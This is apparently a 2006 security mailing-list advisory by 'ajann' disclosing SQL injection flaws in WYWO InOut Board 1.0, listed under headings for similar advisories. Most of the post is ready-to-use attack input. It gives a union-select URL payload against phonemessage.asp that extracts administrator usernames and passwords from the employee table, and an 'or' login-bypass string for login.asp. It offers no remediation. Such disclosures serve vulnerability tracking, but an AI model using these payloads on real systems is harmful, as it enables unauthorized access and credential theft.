Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability

ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

x-news 1.1 Password Disclosure Vulnerability

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	31.12.2006
Subject:	Title : WYWO - InOut Board 1.0 Multiple Vulnerabilities

*******************************************************************************
# Title   :  WYWO - InOut Board 1.0 Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://cybercoded.com
# $$      :  9.95 $

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path/phonemessage.asp?num=[SQL]

Example:

//phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0%20from%20employee%20where%20Admin='Yes'
[[/SQL]]

[[Login ByPass]]]---------------------------------------------------------

http://[target]/[path]//faqDsp.asp?catcode=[SQL]

Example:

//login.asp   Username: 'or' Password: 'or'

[[/Login ByPass]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!